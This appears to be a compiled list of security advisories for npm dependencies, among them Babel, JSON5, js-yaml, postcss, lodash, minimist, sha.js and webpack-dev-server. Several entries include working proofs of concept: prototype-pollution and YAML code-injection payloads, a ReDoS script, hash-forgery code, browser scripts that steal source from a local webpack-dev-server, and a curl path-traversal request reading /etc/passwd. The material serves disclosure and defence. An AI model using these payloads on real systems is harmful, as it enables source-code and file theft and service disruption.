All the vulnerabilities related to the version 0.5.1 of the package
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()
or path.evaluateTruthy()
internal Babel methods.
Known affected plugins are:
@babel/plugin-transform-runtime
@babel/preset-env
when using its useBuiltIns
option@babel/helper-define-polyfill-provider
, such as babel-plugin-polyfill-corejs3
, babel-plugin-polyfill-corejs2
, babel-plugin-polyfill-es-shims
, babel-plugin-polyfill-regenerator
No other plugins under the @babel/
namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
The vulnerability has been fixed in @babel/traverse@7.23.2
.
Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6
.
@babel/traverse
to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core
>=7.23.2 will automatically pull in a non-vulnerable version.@babel/traverse
and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse
versions:
@babel/plugin-transform-runtime
v7.23.2@babel/preset-env
v7.23.2@babel/helper-define-polyfill-provider
v0.4.3babel-plugin-polyfill-corejs2
v0.4.6babel-plugin-polyfill-corejs3
v0.8.5babel-plugin-polyfill-es-shims
v0.10.0babel-plugin-polyfill-regenerator
v0.5.3Prototype Pollution in JSON5 via Parse Method
The parse
method of the JSON5 library before and including version 2.2.1
does not restrict parsing of keys named __proto__
, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse
and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse
. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse
, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin
key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__
key to {"isAdmin": true}
. JSON5
will parse this key and will set the isAdmin
key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
Prototype pollution in webpack loader-utils
Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils prior to version 2.0.3 via the name variable in parseQuery.js.
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
Denial of Service in js-yaml
Versions of js-yaml
prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml
prior to 3.13.1 are vulnerable to Code Injection. The load()
function may execute arbitrary code injected through a malicious YAML file. Objects that have toString
as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load()
function. The safeLoad()
function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service (ReDoS)
The is-svg package 2.1.0 through 4.2.1 for Node.js uses a regular expression that is vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input.
ReDOS in IS-SVG
A vulnerability was discovered in IS-SVG version 4.3.1 and below where a Regular Expression Denial of Service (ReDOS) occurs if the application is provided and checks a crafted invalid SVG string.
Regular Expression Denial of Service (ReDOS)
In the npm package color-string
, there is a ReDos (Regular Expression Denial of Service) vulnerability regarding an exponential time complexity for
linearly increasing input lengths for hwb()
color strings.
Strings reaching more than 5000 characters would see several milliseconds of processing time; strings reaching more than 50,000 characters began seeing 1500ms (1.5s) of processing time.
The cause was due to a the regular expression that parses hwb() strings - specifically, the hue value - where the integer portion of the hue value used a 0-or-more quantifier shortly thereafter followed by a 1-or-more quantifier.
This caused excessive backtracking and a cartesian scan, resulting in exponential time complexity given a linear increase in input length.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r
discrepancies, as demonstrated by @font-face{ font:(\r/*);}
in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
kangax html-minifier REDoS vulnerability
A Regular Expression Denial of Service (ReDoS) flaw was found in kangax html-minifier 4.0.0 because of the reCustomIgnore regular expression.
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick
, set
, setWith
, update
, updateWith
, and zipObjectDeep
allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
Improper Privilege Management in shelljs
shelljs is vulnerable to Improper Privilege Management
Improper Privilege Management in shelljs
Output from the synchronous version of shell.exec()
may be visible to other users on the same system. You may be affected if you execute shell.exec()
in multi-user Mac, Linux, or WSL environments, or if you execute shell.exec()
as the root user.
Other shelljs functions (including the asynchronous version of shell.exec()
) are not impacted.
Patched in shelljs 0.8.5
Recommended action is to upgrade to 0.8.5.
https://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c/
If you have any questions or comments about this advisory:
Prototype Pollution in minimist
Affected versions of minimist
are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object
, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted
adds a y
property with value Polluted
to all objects. The argument --__proto__=Polluted
raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist
.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js
, function setKey()
(lines 69-95).
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end()
method.
Command Injection in lodash
lodash
versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Prototype Pollution in extend
Versions of extend
prior to 3.0.2 (for 3.x) and 2.0.2 (for 2.x) are vulnerable to Prototype Pollution. The extend()
function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.
If you're using extend
3.x upgrade to 3.0.2 or later.
If you're using extend
2.x upgrade to 2.0.2 or later.
dot-prop Prototype Pollution vulnerability
Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.
Got allows a redirect to a UNIX socket
The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.
mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input
Affected versions of mime
are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.
Update to version 2.0.3 or later.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch
prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces()
in index.js
because the pattern .*
will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
Regular Expression Denial of Service (ReDoS) in braces
A vulnerability was found in Braces versions prior to 2.3.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in braces
Versions of braces
prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces
fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js,
if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js
, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer
or string
, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
{length: -x}
. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.{ length: buf.length, ...buf, 0: buf[0] + 256 }
This will result in the same hash as of buf
, but can be treated by other code differently (e.g. bn.js){length:'1e99'}
webpack-dev-server users' source code may be stolen when they access a malicious web site
Source code may be stolen when you access a malicious web site.
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js">
in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString
against the values in __webpack_modules__
, the attacker can get the source code.
npm i
npx webpack-dev-server
https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
The script in the POC site is:
let moduleList
const onHandlerSet = (handler) => {
console.log('h', handler)
moduleList = handler.require.m
}
const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
callback((handler) => {
onHandlerSet(handler)
})
originalArrayForEach.call(this, callback, thisArg)
Array.prototype.forEach = originalArrayForEach
}
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
})
document.head.appendChild(script)
This script uses the function generated by renderRequire
.
// The require function
function __webpack_require__(moduleId) {
// Check if module is in cache
var cachedModule = __webpack_module_cache__[moduleId];
if (cachedModule !== undefined) {
return cachedModule.exports;
}
// Create a new module (and put it into the cache)
var module = __webpack_module_cache__[moduleId] = {
// no module.id needed
// no module.loaded needed
exports: {}
};
// Execute the module function
var execOptions = {
id: moduleId,
module: module,
factory: __webpack_modules__[moduleId],
require: __webpack_require__
};
__webpack_require__.i.forEach(function(handler) {
handler(execOptions);
});
module = execOptions.module;
execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
// Return the exports of the module
return module.exports;
}
Especially, it uses the fact that Array::forEach
is called for __webpack_require__.i
and execOptions
contains __webpack_require__
.
It uses prototype pollution against Array::forEach
to extract __webpack_require__
reference.
This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.
<details> <summary>Old content</summary>Source code may be stolen when you use output.iife: false
and access a malicious web site.
When output.iife: false
is set, some global variables for the webpack runtime are declared on the window
object (e.g. __webpack_modules__
).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js">
in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window
object.
By using Function::toString
against the values in __webpack_modules__
, the attacker can get the source code.
I pointed out output.iife: false
, but if there are other options that makes the webpack runtime variables to be declared on the window
object, the same will apply for those cases.
npm i
npx webpack-dev-server
https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
src/index.js
and other scripts loaded.The script in the POC site is:
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
for (const module in window.__webpack_modules__) {
console.log(`${module}:`, window.__webpack_modules__[module].toString())
}
})
document.head.appendChild(script)
This vulnerability can result in the source code to be stolen for users that has output.iife: false
option set and uses a predictable port and output path for the entrypoint script.
webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser
Source code may be stolen when you access a malicious web site with non-Chromium based browser.
The Origin
header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin
headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.
related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that checkHost
function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.
This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.
npm i
npx webpack-dev-server
http://{ipaddress}/?target=http://localhost:8080&file=main
with a non-Chromium browser (I used Firefox 134.0.1)src/index.js
in the extracted directorysrc/index.js
The script in the POC site is:
window.webpackHotUpdate = (...args) => {
console.log(...args);
for (i in args[1]) {
document.body.innerText = args[1][i].toString() + document.body.innerText
console.log(args[1][i])
}
}
let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
console.log(event.data);
if (event.data.match('"type":"ok"')) {
s = document.createElement('script');
s.src = `${target}${file}.${currentHash2}.hot-update.js`;
document.body.appendChild(s)
}
r = event.data.match(/"([0-9a-f]{20})"/);
if (r !== null) {
currentHash2 = currentHash;
currentHash = r[1];
console.log(currentHash, currentHash2);
}
}
This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.
Missing Origin Validation in webpack-dev-server
Versions of webpack-dev-server
before 3.1.10 are missing origin validation on the websocket server. This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated.
For webpack-dev-server
update to version 3.1.11 or later.
Path traversal in webpack-dev-middleware
The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine.
The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory memfs filesystem. If writeToDisk configuration option is set to true, the physical filesystem is used: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21
The getFilenameFromUrl method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the unsecaped path suffix is appended to the outputPath: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use %2e and %2f sequences to perform path traversal attack.
A blank project can be created containing the following configuration file webpack.config.js:
module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
When started, it is possible to access any local file, e.g. /etc/passwd:
$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
The developers using webpack-dev-server or webpack-dev-middleware are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).
If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, Allow-Access-Origin: * ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.
The URL should be unescaped and normalized before any further processing.